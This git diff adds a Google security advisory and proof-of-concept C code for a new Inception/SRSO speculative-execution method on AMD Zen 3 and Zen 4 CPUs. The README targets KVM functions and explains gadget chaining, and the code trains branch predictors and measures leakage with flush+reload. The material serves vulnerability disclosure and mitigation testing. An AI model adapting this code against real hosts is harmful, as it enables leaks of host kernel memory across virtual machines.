diff --git a/pocs/cpus/inception/Makefile b/pocs/cpus/inception/Makefile new file mode 100644 index 00000000..9921ce3f --- /dev/null +++ b/pocs/cpus/inception/Makefile @@ -0,0 +1,7 @@ +all: clean poc + +poc: + $(CC) $(CFLAGS) -static -O0 poc.c -o poc + +clean: + rm -f poc diff --git a/pocs/cpus/inception/README.md b/pocs/cpus/inception/README.md new file mode 100644 index 00000000..9d10c5a7 --- /dev/null +++ b/pocs/cpus/inception/README.md @@ -0,0 +1,197 @@ +# Novel Inception/SRSO exploitation method + +TL;DR We could exploit SRSO in KVM on AMD Zen 3 and Zen 4 by controlling the +full return address stack (RAS). We did so by injecting a PhantomJMP (which +subsequently injects a PhantomCALL) in the pipeline after a dispatch serializing +instruction. + +### Context + +The Inception paper reports that on Zen 3 they could only poison one RAS entry +and required a deep call stack to discard the corrected entries. On Zen 4, they +report that they could poison multiple entries but they still needed a deep call +stack to discard the corrected ones. As a result, they could only exploit SRSO +on Zen 4 and they reported that they didn't find a suitable code pattern to +exploit it on Zen 3. + +> "Specifically, on Zen 3 microarchitectures we hijack a single return +> instruction by first exhausting 17 uncorrupted RSB entries. On Zen 4, we need +> to exhaust 8 uncorrupted RSB entries, after which we control the next 16 +> return target predictions."[^1] + +### Problem + +We experimented with the findings in the Inception paper and observed that +injecting the PhantomJMP after a dispatch serializing instruction like `rdtscp`, +`lfence`, `cpuid`, `wrmsr`, `invlpga` will preserve all RAS entries injected by +the PhantomCALL and all of them will be used for predicting the following return +instructions. See the code below. + +``` +cpuid +instr +instr +.. +ret +``` + +If the PhantomJMP collides in the BTB with any of the instructions following +`cpuid`, then the `ret` speculatively executes the gadget injected by the +PhantomCALL. Moreover, all following `ret` instructions will continue +mispredicting from the poisoned RAS entries. We attached a proof-of-concept +implementation of this vulnerability which works on Zen 3 and Zen 4. + +We tested it on the following cpus: + +- AMD EPYC 9B14 96-Core Processor ucode(0xa101144) + +- AMD EPYC 7B13 64-Core Processor ucode (0xa0011d1) + +### Proof-of-concept + +Consider the code above to be the vulnerable code pattern. We train the +PhantomJMP to collide with the `ret` following `cpuid`. The PhantomJMP +destination is the PhantomCALL location. We train the PhantomCALL to collide +with the instruction preceeding the gadget. We find that the requirements +presented in the paper regarding the location and destination of the +PhantomJMP (section 6.3) are not necessary for the exploit to work neither on +Zen 3 nor Zen 4. + +poc.c allows you to pass the depth of the call stack in the command line. Before +every return, we shift the flush+reload array by 0x1000 to measure precisely +which return instructions in the call stack mispredicted from the RAS. + +### Results + +We show that on both Zen 3 and Zen 4 we can control the full RAS. + +``` +make +./poc 32 # will report hits from entry 0 to 32. +``` + +To test without the dispatch serializing instruction: + +``` +make CFLAGS="-DNO_DSI=1" +./poc 32 # will report a few entries > only +``` + +In our experiments, we added a RSB clearing sequence to see if that would remove +the signal. + +``` +make CFLAGS="-DMITIGATION -DRSB_DEPTH=8" +./poc 32 # will report hits from entry 0 and 8-32 +``` + +To clear the signal, run the following: + +``` +make CFLAGS="-DMITIGATION -DRSB_DEPTH=32" +./poc 32 # will report hits on entry #0 +``` + +We didn't clear the signal for the first return in the `a()` execution so a hit +for entry #0 will always show up. + +### Root Cause hypothesis + +As a result of our analysis, we hypothesize that this vulnerability is possible +because of the special microarchitectural conditions created by the +architectural execution of dispatch serializing instructions. We think that such +instruction brings the RAS in a "clean" state which doesn't trigger the +invalidation of RAS entries injected as a result of PhantomCALL speculation. + +### Mitigation + +We didn't research what impact does this finding have on safeRET. Given that +this vulnerability happens in microarchitectural conditions created by dispatch +serializing instructions and that such instructions are microcoded, we think AMD +might be able to issue a microcode fix. We confirmed that IBPB mitigates this +issue on Zen 3 and Zen 4. + +#### New mitigation discussion + +We investigated a potential mitigation for this particular vulnerability, namely +clearing the RSB before the first return instruction that comes after a dispatch +serializing instruction. We used the upstream Linux RSB clearing sequence in our +experiments. We observed that the PhantomJMP can be trained to overlap with one +of the RSB clearing sequence instructions or with the `ret`, therefore the +signal was still present for specific RSB entries. With a 32-entry RSB clearing +sequence, we couldn't observe signal for the first `ret` in the deep call stack +but from the 20th `ret` execution onwards, depending on the depth of the call +stack. + +We conclude, based on our experiments, that clearing the RSB before the first +return instruction that executes after a dispatch serializing instruction, +reduces the risk of this vulnerability by hindering the possibility of +controlling the full RSB. + +### Impact + +Vulnerable function | Serializing instruction +------------------------------------------------------------------------------------------------------------------- | ----------------------- +[kvm_set_user_return_msr](https://elixir.bootlin.com/linux/v6.10.3/C/ident/kvm_set_user_return_msr) | wrmsr +[kvm_set_msr_common](https://elixir.bootlin.com/linux/v6.10.3/C/ident/kvm_set_msr_common) | wrmsr +[vcpu_enter_guest](https://elixir.bootlin.com/linux/v6.10.3/C/ident/vcpu_enter_guest) | wrmsr +[svm_complete_interrupt_delivery](https://elixir.bootlin.com/linux/v6.10.3/C/ident/svm_complete_interrupt_delivery) | wrmsr +[kvm_emulate_wbinvd](https://elixir.bootlin.com/linux/v6.10.3/C/ident/kvm_emulate_wbinvd) | wbinvd +[svm_flush_tlb_gva](https://elixir.bootlin.com/linux/v6.10.3/C/ident/svm_flush_tlb_gva) | invlpga +[read_tsc](https://elixir.bootlin.com/linux/v6.10.3/C/ident/read_tsc) | rdtscp + +We found 7 code patterns (see above) in the upstream Linux KVM implementation +which are potentially exploitable. We have a full exploit for `read_tsc` which +we trigger using `vmmcall` with `rax = KVM_HC_CLOCK_PAIRING`. This was the +easiest to exploit because the guest controls up to three (3) arguments. The +exploit works on AMD Zen 3 and we consider it needs a few small adjustments to +work on AMD Zen 4 as well. We achieved an arbitrary memory read primitive in the +host kernel. + +Given the above, we consider the risk assessment section of this recent +[AMD report](https://www.amd.com/content/dam/amd/en/documents/epyc-technical-docs/white-papers/amd-epyc-9004-wp-srso.pdf) +to be inaccurate. + +#### Speculative ROP + +We discovered a novel method to control the RAS that allows us to chain gadgets +to construct a disclosure primitive. This method is different from the "Dueling +recursive phantom calls" presented in the Inception paper (Section 7.4). + +To inject two gadgets in the RAS, we use two chained recursive PhantomCALLs. + +``` +gadget1 - 5: PhantomCALL (call gadget2 - 5) +gadget1: +``` + +``` +gadget2 - 5: PhantomCALL (call gadget1 - 5) +gadget2: +``` + +When `gadget1 - 5` is fetched, `gadget1` is pushed to RAS. Then the cpu starts +fetching at `gadget2 - 5`, according to the first PhantomCALL destination. That +pushes `gadget2` to RAS. Next, the cpu fetches at `gadget1 - 5` again and pushes +`gadget1` to RAS and so on. This results in `gadget1` and `gadget2` to be +interleaved in the RAS. + +With this method we could chain up to three (3) gadgets. In our KVM exploit, we +only need to chain two gadgets to achieve a reliable disclosure primitive. + +### Disclosure + +We are privately disclosing this vulnerability to you so that you can develop a +fix and manage its rollout. We do not require you to keep any information of +this report secret, but if you make it public then please let us know that you +did. This advisory will be kept private by Google for 30 days after a fix is +publicly available or after 90 days if no fix is made. After this deadline we +plan to disclose this advisory in full at: +http://github.com/google/security-research/. Please read more details about this +policy here: https://g.co/appsecurity + +Finder: Andy Nguyen of the Google Security Team + +Credits: Andy Nguyen, Anthony Weems, Matteo Rizzo, Alexandra Sandulescu + +[^1]: https://comsec.ethz.ch/wp-content/files/inception_sec23.pdf diff --git a/pocs/cpus/inception/out.txt b/pocs/cpus/inception/out.txt new file mode 100644 index 00000000..eb8a06b5 --- /dev/null +++ b/pocs/cpus/inception/out.txt @@ -0,0 +1,198 @@ +inception +==== round 0 ===== +==== round 1 ===== +hit for 1 +hit for 2 +hit for 11 +hit for 12 +==== round 2 ===== +hit for 0 +hit for 1 +hit for 2 +hit for 5 +hit for 6 +hit for 7 +hit for 8 +hit for 9 +hit for 10 +hit for 11 +hit for 12 +hit for 13 +hit for 14 +hit for 15 +hit for 16 +hit for 17 +hit for 18 +hit for 19 +hit for 20 +hit for 21 +hit for 22 +hit for 23 +hit for 24 +hit for 25 +hit for 26 +hit for 27 +hit for 28 +hit for 29 +hit for 30 +hit for 31 +hit for 32 +hit for 33 +hit for 34 +==== round 3 ===== +hit for 0 +hit for 1 +hit for 4 +hit for 5 +hit for 21 +==== round 4 ===== +hit for 0 +hit for 1 +hit for 2 +hit for 3 +hit for 4 +hit for 5 +hit for 6 +hit for 7 +hit for 8 +hit for 9 +hit for 10 +hit for 11 +hit for 12 +hit for 13 +hit for 14 +hit for 15 +hit for 16 +hit for 17 +hit for 18 +hit for 19 +hit for 20 +hit for 21 +hit for 22 +hit for 23 +hit for 24 +hit for 25 +hit for 26 +hit for 27 +hit for 28 +hit for 29 +hit for 30 +hit for 31 +hit for 32 +hit for 33 +hit for 34 +==== round 5 ===== +hit for 0 +hit for 1 +hit for 17 +hit for 18 +==== round 6 ===== +hit for 0 +hit for 1 +hit for 2 +hit for 3 +hit for 4 +hit for 5 +hit for 6 +hit for 7 +hit for 8 +hit for 9 +hit for 10 +hit for 11 +hit for 12 +hit for 13 +hit for 14 +hit for 15 +hit for 16 +hit for 17 +hit for 18 +hit for 19 +hit for 20 +hit for 21 +hit for 22 +hit for 23 +hit for 24 +hit for 25 +hit for 26 +hit for 27 +hit for 28 +hit for 29 +hit for 30 +hit for 31 +hit for 32 +hit for 33 +hit for 34 +==== round 7 ===== +hit for 0 +hit for 1 +hit for 2 +hit for 3 +hit for 4 +hit for 5 +hit for 6 +hit for 7 +hit for 8 +hit for 9 +hit for 10 +hit for 11 +hit for 12 +hit for 13 +hit for 14 +hit for 15 +hit for 16 +hit for 17 +hit for 18 +hit for 19 +hit for 20 +hit for 21 +hit for 22 +hit for 23 +hit for 24 +hit for 25 +hit for 26 +hit for 27 +hit for 28 +hit for 29 +hit for 30 +hit for 31 +hit for 32 +hit for 33 +hit for 34 +==== round 8 ===== +hit for 0 +hit for 1 +hit for 2 +hit for 3 +hit for 4 +hit for 5 +hit for 6 +hit for 7 +hit for 8 +hit for 9 +hit for 10 +hit for 11 +hit for 12 +hit for 13 +hit for 14 +hit for 15 +hit for 16 +hit for 17 +hit for 18 +hit for 19 +hit for 20 +hit for 21 +hit for 22 +hit for 23 +hit for 24 +hit for 25 +hit for 26 +hit for 27 +hit for 28 +hit for 29 +hit for 30 +hit for 31 +hit for 32 +hit for 33 +hit for 34 +==== round 9 ===== +hit for 0 diff --git a/pocs/cpus/inception/poc.c b/pocs/cpus/inception/poc.c new file mode 100644 index 00000000..3b8fa12d --- /dev/null +++ b/pocs/cpus/inception/poc.c @@ -0,0 +1,320 @@ +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define PWN_PATTERN 0x100100000000 +#define ADDRESS_A 0x20000000 +#define ADDRESS_B (ADDRESS_A ^ PWN_PATTERN) +#define CACHE_THRESHOLD 120 +#define ITERATIONS 10 + +// Hopefully tricks the prefetcher to avoid false positives. +#define PREFETCH_OFFSET 0x800 + +static int should_segfault = 0; + +static void pin_cpu(int cpu) { + cpu_set_t set; + CPU_ZERO(&set); + + CPU_SET(cpu, &set); + sched_setaffinity(0, sizeof(set), &set); +} + +// Load a byte from memory and time how long it takes +static uint64_t time_load(const void *addr) { + uint64_t ret; + + asm volatile( + // rdtscp waits for earlier instructions to retire before reading the + // TSC. + "rdtscp\n" + // timestamp in r8d:ebx + "mov %%eax, %%ebx\n" + "mov %%edx, %%r8d\n" + "lfence\n" + + // Do the memory access. + "movb (%%rdi), %%cl\n" + + // On AMD/Linux lfence always waits for all previous instructions to + // retire before executing the next instruction. + "rdtscp\n" + // timestamp in edx:eax + "lfence\n" + + "shlq $32, %%r8\n" + // timestamp in rbx + "orq %%r8, %%rbx\n" + "shlq $32, %%rdx\n" + // timestamp in rax + "orq %%rdx, %%rax\n" + "subq %%rbx, %%rax\n" + : "=a"(ret) + : "D"(addr) + : "rbx", "rcx", "rdx", "r8"); + + return ret; +} + +static __attribute__((naked, noinline)) void train_arch( + uint64_t target, uint64_t training_code) { + asm volatile( + "mov %0, %%r8\n\t" + // Used to recover from crash + "leaq 1f(%%rip), %%rcx\n\t" + + "jmp *%%rsi\n" + + "1:\n" + "pop %%rax\n\t" + "2:" + "retq\n" ::"r"(target), + "S"(training_code) + : "memory", "r8"); +} + +extern void *a_start, *a_load, *a_end; +extern void *b_start, *b_load, *b_end; + +#define STR(x) #x +#define XSTR(s) STR(s) +static __attribute__((naked, noinline, used)) void gadgets() { + asm("a_start:\n" +#ifndef NO_DSI + " push %rax\n" + " push %rbx\n" + " push %rcx\n" + " push %rdx\n" + " cpuid\n" + " pop %rdx\n" + " pop %rcx\n" + " pop %rbx\n" + " pop %rax\n" +#endif + // PhantomJMP + " nop\n" + " nop\n" + " ret\n" + ".skip 0x1000, 0x90\n" + "a_load:\n" + // PhantomCALL + " call a_some_func\n" + // Loads from rdi which points to a fr_array entry + " movq " XSTR(PREFETCH_OFFSET) "(%rdi), %rax\n" + " xor %rdi, %rdi\n" + " ret\n" + "a_some_func:\n" + " ret\n" + "a_end:\n"); + + asm("b_start:\n" +#ifndef NO_DSI + " nop\n" + " nop\n" + " nop\n" + " nop\n" + " nop\n" + " nop\n" + " nop\n" + " nop\n" + " nop\n" + " nop\n" +#endif + " call *%r8\n" // training jmp + ".skip 0x1000, 0x90\n" + "b_load:\n" + " call *%r8\n" // training call + "b_end:\n"); +} + +#define lfsr_advance(lfsr) \ + { \ + uint8_t bit = (lfsr ^ (lfsr >> 2) ^ (lfsr >> 3) ^ (lfsr >> 4)) & 1; \ + lfsr = (lfsr >> 1) | (bit << 7); \ + } + +#define FR_COUNT 256 +#define FR_ARRAY_SIZE (2 * 1024 * 1024) +#define FR_STRIDE 0x1000 + +static void *fr_array; + +static __always_inline void inception_flush(void) { + for (int i = 0; i < FR_COUNT; i++) { + asm volatile("clflush (%0)" + : + : "r"(fr_array + i * FR_STRIDE + PREFETCH_OFFSET) + : "memory"); + } + + asm volatile("mfence" ::: "memory"); +} +static __always_inline void inception_flush_one(uint64_t ptr) { + asm volatile("clflush (%0); mfence" : : "r"(ptr) : "memory"); +} + +static __always_inline uint8_t inception_reload(int hits[]) { + asm volatile("mfence" ::: "memory"); + + // use lfsr because of aggressive prefetching + uint8_t lfsr = 123; + + uint64_t t = time_load(fr_array + PREFETCH_OFFSET); + inception_flush_one((uint64_t)fr_array + PREFETCH_OFFSET); + if (t < CACHE_THRESHOLD) hits[0] = 1; + + for (int i = 1; i < FR_COUNT; i++) { + lfsr_advance(lfsr); + uint64_t t = time_load(fr_array + lfsr * FR_STRIDE + PREFETCH_OFFSET); + // flush immediately after + inception_flush_one( + (uint64_t)(fr_array + lfsr * FR_STRIDE + PREFETCH_OFFSET)); + + if (t < CACHE_THRESHOLD) hits[lfsr] = 1; + } + + return 0; +} + +static void handle_segv(int sig, siginfo_t *si, void *ucontext) { + ucontext_t *ctx = ucontext; + + if (!should_segfault) { + printf("Unexpected segfault\n"); + exit(1); + } + + should_segfault = 0; + ctx->uc_mcontext.gregs[REG_RIP] = ctx->uc_mcontext.gregs[REG_RCX]; +} + +extern void deep_callstack_done(void); + +int main(int argc, char *argv[]) { + int depth = 20; + if (argc >= 2) { + depth = atoi(argv[1]); + + if (depth < 2) { + printf("invalid depth. Must be >= 2\n"); + exit(EXIT_FAILURE); + } + } + + struct sigaction sa; + sa.sa_flags = SA_SIGINFO; + sigemptyset(&sa.sa_mask); + sa.sa_sigaction = &handle_segv; + sigaction(SIGSEGV, &sa, NULL); + + printf("inception\n"); + + pin_cpu(1); + + fr_array = mmap((void *)0x10000000, 2 * 1024 * 1024, PROT_READ | PROT_WRITE, + MAP_ANONYMOUS | MAP_PRIVATE | MAP_FIXED, -1, 0); + memset(fr_array, 'A', 2 * 1024 * 1024); + + void *a = (void *)mmap((void *)ADDRESS_A, 2 * 1024 * 1024, + PROT_READ | PROT_WRITE | PROT_EXEC, + MAP_ANONYMOUS | MAP_PRIVATE | MAP_FIXED, -1, 0); + memcpy((void *)a, &a_start, (uint64_t)&a_end - (uint64_t)&a_start); + + void *b = (void *)mmap((void *)ADDRESS_B, 2 * 1024 * 1024, + PROT_READ | PROT_WRITE | PROT_EXEC, + MAP_ANONYMOUS | MAP_PRIVATE | MAP_FIXED, -1, 0); + memcpy((void *)b, &b_start, (uint64_t)&b_end - (uint64_t)&b_start); + + if ((uint64_t)&a_load - (uint64_t)&a_start != + (uint64_t)&b_load - (uint64_t)&b_start) { + printf("mismatch: %lx vs %lx\n", (uint64_t)&a_load - (uint64_t)&a_start, + (uint64_t)&b_load - (uint64_t)&b_start); + return 0; + } + + for (int j = 0; j < ITERATIONS; j++) { + munmap(a, 2 * 1024 * 1024); + + mprotect(b, 2 * 1024 * 1024, PROT_READ | PROT_WRITE | PROT_EXEC); + + // Train + for (int i = 0; i < 2; i++) { + should_segfault = 1; + train_arch(ADDRESS_A + ((uint64_t)&a_load - (uint64_t)&a_start), + (ADDRESS_B + (uint64_t)&b_start - (uint64_t)&b_start)); + + should_segfault = 1; + train_arch(ADDRESS_A + ((uint64_t)&a_load - (uint64_t)&a_start), + (ADDRESS_B + (uint64_t)&b_load - (uint64_t)&b_start)); + } + + // mark b as NX + mprotect(b, 2 * 1024 * 1024, PROT_READ | PROT_WRITE); + + a = (void *)mmap((void *)ADDRESS_A, 2 * 1024 * 1024, + PROT_READ | PROT_WRITE | PROT_EXEC, + MAP_ANONYMOUS | MAP_PRIVATE | MAP_FIXED, -1, 0); + memcpy((void *)a, &a_start, (uint64_t)&a_end - (uint64_t)&a_start); + + printf("==== round %d =====\n", j); + + // FLush + inception_flush(); + + // Trigger victim + // deep call stack + asm volatile( + "push %3; mfence\n\t" // last ret will exit + "z: cmp $2, %0; jle out; dec %0\n\t" + "call z\n\t" + // shift the fr_array ptr + "add $0x1000, %%rdi; ret\n\t" + + "out:\n\t" + "mov %1, %%rdi\n\t" + "call *%2\n\t" + +#ifdef MITIGATION +#ifndef RSB_DEPTH +#define RSB_DEPTH 32 +#endif + // RSB clearing + ".rept " XSTR(RSB_DEPTH) "\n" + "call 1f\n" + "int3\n" + "1:\n" + ".endr\n" + "add $(8 * " XSTR(RSB_DEPTH) "), %%rsp\n" +#endif + // shift the fr_array ptr + "add $0x1000, %%rdi\n\t" + "ret\n\t" + "deep_callstack_done:" + : + : "r"(depth), "r"(fr_array), "r"(a), "r"(deep_callstack_done) + : "rdi", "memory", "rcx"); + + // Reload + int hits[256] = {}; + inception_reload(hits); + + for (int i = 0; i < 256; i++) + if (hits[i]) printf("hit for %d\n", i); + + fflush(stdout); + } + + return 0; +} diff --git a/pocs/cpus/inception/poc3.c b/pocs/cpus/inception/poc3.c new file mode 100644 index 00000000..89a0808c --- /dev/null +++ b/pocs/cpus/inception/poc3.c @@ -0,0 +1,344 @@ +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define PWN_PATTERN 0x000080080000 +#define ADDRESS_A 0x20000000 +#define ADDRESS_B (ADDRESS_A ^ PWN_PATTERN) +#define CACHE_THRESHOLD 120 +#define ITERATIONS 10 + +// Hopefully tricks the prefetcher to avoid false positives. +#define PREFETCH_OFFSET 0x800 + +static int should_segfault = 0; + +static void pin_cpu(int cpu) { + cpu_set_t set; + CPU_ZERO(&set); + + CPU_SET(cpu, &set); + sched_setaffinity(0, sizeof(set), &set); +} + +// Load a byte from memory and time how long it takes +static uint64_t time_load(const void *addr) { + uint64_t ret; + + asm volatile( + // rdtscp waits for earlier instructions to retire before reading the + // TSC. + "rdtscp\n" + // timestamp in r8d:ebx + "mov %%eax, %%ebx\n" + "mov %%edx, %%r8d\n" + "lfence\n" + + // Do the memory access. + "movb (%%rdi), %%cl\n" + + // On AMD/Linux lfence always waits for all previous instructions to + // retire before executing the next instruction. + "rdtscp\n" + // timestamp in edx:eax + "lfence\n" + + "shlq $32, %%r8\n" + // timestamp in rbx + "orq %%r8, %%rbx\n" + "shlq $32, %%rdx\n" + // timestamp in rax + "orq %%rdx, %%rax\n" + "subq %%rbx, %%rax\n" + : "=a"(ret) + : "D"(addr) + : "rbx", "rcx", "rdx", "r8"); + + return ret; +} + +static __attribute__((naked, noinline)) void train_arch( + uint64_t target, uint64_t training_code) { + asm volatile( + "mov %0, %%r8\n\t" + // Used to recover from crash + "leaq 1f(%%rip), %%rcx\n\t" + + "jmp *%%rsi\n" + + "1:\n" + "pop %%rax\n\t" + "2:" + "retq\n" ::"r"(target), + "S"(training_code) + : "memory", "r8"); +} + +static __attribute__((naked, noinline)) void train_ret(uint64_t target, + uint64_t training_code) { + asm volatile( + "mov %0, %%r8\n\t" + + // Flush the stack to widen the speculation window. + "clflush -8(%%rsp)\n" + "mfence\n" + + "call 1f\n" + // Executed only speculatively + "jmp *%%rsi\n" + "lfence\n" + + "1:\n" + // For some reason, compiler emits a different instruction that crashes, + // so hardcode bytes here. + // add 0x8, %%rsp + ".byte 0x48, 0x83, 0xc4, 0x08\n" + "retq\n" ::"r"(target) + : "memory"); +} + +extern void *a_start, *a_load, *a_end; +extern void *b_start, *b_load, *b_end; + +#define STR(x) #x +#define XSTR(s) STR(s) +static __attribute__((naked, noinline, used)) void gadgets() { + asm("a_start:\n" +#ifndef NO_DSI + " push %rax\n" + " push %rbx\n" + " push %rcx\n" + " push %rdx\n" + " cpuid\n" + " pop %rdx\n" + " pop %rcx\n" + " pop %rbx\n" + " pop %rax\n" +#endif + // PhantomJMP + " nop\n" + " nop\n" + " ret\n" + ".skip 0x1000, 0x90\n" + "a_load:\n" + // PhantomCALL + " call a_some_func\n" + // Loads from rdi which points to a fr_array entry + " movq " XSTR(PREFETCH_OFFSET) "(%rdi), %rax\n" + " xor %rdi, %rdi\n" + " ret\n" + "a_some_func:\n" + " ret\n" + "a_end:\n"); + + asm("b_start:\n" +#ifndef NO_DSI + " nop\n" + " nop\n" + " nop\n" + " nop\n" + " nop\n" + " nop\n" + " nop\n" + " nop\n" + " nop\n" + " nop\n" +#endif + " call *%r8\n" // training jmp + ".skip 0x1000, 0x90\n" + "b_load:\n" + " call *%r8\n" // training call + "b_end:\n"); +} + +#define lfsr_advance(lfsr) \ + { \ + uint8_t bit = (lfsr ^ (lfsr >> 2) ^ (lfsr >> 3) ^ (lfsr >> 4)) & 1; \ + lfsr = (lfsr >> 1) | (bit << 7); \ + } + +#define FR_COUNT 256 +#define FR_ARRAY_SIZE (2 * 1024 * 1024) +#define FR_STRIDE 0x1000 + +static void *fr_array; + +static __always_inline void inception_flush(void) { + for (int i = 0; i < FR_COUNT; i++) { + asm volatile("clflush (%0)" + : + : "r"(fr_array + i * FR_STRIDE + PREFETCH_OFFSET) + : "memory"); + } + + asm volatile("mfence" ::: "memory"); +} +static __always_inline void inception_flush_one(uint64_t ptr) { + asm volatile("clflush (%0); mfence" : : "r"(ptr) : "memory"); +} + +static __always_inline uint8_t inception_reload(int hits[]) { + asm volatile("mfence" ::: "memory"); + + // use lfsr because of aggressive prefetching + uint8_t lfsr = 123; + + uint64_t t = time_load(fr_array + PREFETCH_OFFSET); + inception_flush_one((uint64_t)fr_array + PREFETCH_OFFSET); + if (t < CACHE_THRESHOLD) hits[0] = 1; + + for (int i = 1; i < FR_COUNT; i++) { + lfsr_advance(lfsr); + uint64_t t = time_load(fr_array + lfsr * FR_STRIDE + PREFETCH_OFFSET); + // flush immediately after + inception_flush_one( + (uint64_t)(fr_array + lfsr * FR_STRIDE + PREFETCH_OFFSET)); + + if (t < CACHE_THRESHOLD) hits[lfsr] = 1; + } + + return 0; +} + +static void handle_segv(int sig, siginfo_t *si, void *ucontext) { + ucontext_t *ctx = ucontext; + + if (!should_segfault) { + printf("Unexpected segfault\n"); + exit(1); + } + + should_segfault = 0; + ctx->uc_mcontext.gregs[REG_RIP] = ctx->uc_mcontext.gregs[REG_RCX]; +} + +extern void deep_callstack_done(void); + +int main(int argc, char *argv[]) { + int depth = 20; + if (argc >= 2) { + depth = atoi(argv[1]); + + if (depth < 2) { + printf("invalid depth. Must be >= 2\n"); + exit(EXIT_FAILURE); + } + } + + struct sigaction sa; + sa.sa_flags = SA_SIGINFO; + sigemptyset(&sa.sa_mask); + sa.sa_sigaction = &handle_segv; + sigaction(SIGSEGV, &sa, NULL); + + printf("inception\n"); + + pin_cpu(1); + + fr_array = mmap((void *)0x10000000, 2 * 1024 * 1024, PROT_READ | PROT_WRITE, + MAP_ANONYMOUS | MAP_PRIVATE | MAP_FIXED, -1, 0); + memset(fr_array, 'A', 2 * 1024 * 1024); + + void *a = (void *)mmap((void *)ADDRESS_A, 2 * 1024 * 1024, + PROT_READ | PROT_WRITE | PROT_EXEC, + MAP_ANONYMOUS | MAP_PRIVATE | MAP_FIXED, -1, 0); + memcpy((void *)a, &a_start, (uint64_t)&a_end - (uint64_t)&a_start); + + void *b = (void *)mmap((void *)ADDRESS_B, 2 * 1024 * 1024, + PROT_READ | PROT_WRITE | PROT_EXEC, + MAP_ANONYMOUS | MAP_PRIVATE | MAP_FIXED, -1, 0); + memcpy((void *)b, &b_start, (uint64_t)&b_end - (uint64_t)&b_start); + + if ((uint64_t)&a_load - (uint64_t)&a_start != + (uint64_t)&b_load - (uint64_t)&b_start) { + printf("mismatch: %lx vs %lx\n", (uint64_t)&a_load - (uint64_t)&a_start, + (uint64_t)&b_load - (uint64_t)&b_start); + return 0; + } + + for (int j = 0; j < ITERATIONS; j++) { + munmap(a, 2 * 1024 * 1024); + + mprotect(b, 2 * 1024 * 1024, PROT_READ | PROT_WRITE | PROT_EXEC); + + // Train + for (int i = 0; i < 2; i++) { + // should_segfault = 1; + train_ret(ADDRESS_B + ((uint64_t)&b_load - (uint64_t)&b_start), + (ADDRESS_B + (uint64_t)&b_start - (uint64_t)&b_start)); + + // should_segfault = 1; + train_ret(ADDRESS_B + ((uint64_t)&b_load - (uint64_t)&b_start), + (ADDRESS_B + (uint64_t)&b_load - (uint64_t)&b_start)); + } + + // mark b as NX + mprotect(b, 2 * 1024 * 1024, PROT_READ | PROT_WRITE); + + a = (void *)mmap((void *)ADDRESS_A, 2 * 1024 * 1024, + PROT_READ | PROT_WRITE | PROT_EXEC, + MAP_ANONYMOUS | MAP_PRIVATE | MAP_FIXED, -1, 0); + memcpy((void *)a, &a_start, (uint64_t)&a_end - (uint64_t)&a_start); + + sched_yield(); + + // FLush + inception_flush(); + + // Trigger victim + // deep call stack + asm volatile( + "push %3; mfence\n\t" // last ret will exit + "z: cmp $2, %0; jle out; dec %0\n\t" + "call z\n\t" + // shift the fr_array ptr + "add $0x1000, %%rdi; ret\n\t" + + "out:\n\t" + "mov %1, %%rdi\n\t" + "call *%2\n\t" + +#ifdef MITIGATION +#ifndef RSB_DEPTH +#define RSB_DEPTH 32 +#endif + // RSB clearing + ".rept " XSTR(RSB_DEPTH) "\n" + "call 1f\n" + "int3\n" + "1:\n" + ".endr\n" + "add $(8 * " XSTR(RSB_DEPTH) "), %%rsp\n" +#endif + // shift the fr_array ptr + "add $0x1000, %%rdi\n\t" + "ret\n\t" + "deep_callstack_done:" + : + : "r"(depth), "r"(fr_array), "r"(a), "r"(deep_callstack_done) + : "rdi", "memory", "rcx"); + + // Reload + int hits[256] = {}; + inception_reload(hits); + + printf("==== round %d =====\n", j); + for (int i = 0; i < 256; i++) + if (hits[i]) printf("hit for %d\n", i); + + fflush(stdout); + } + + return 0; +}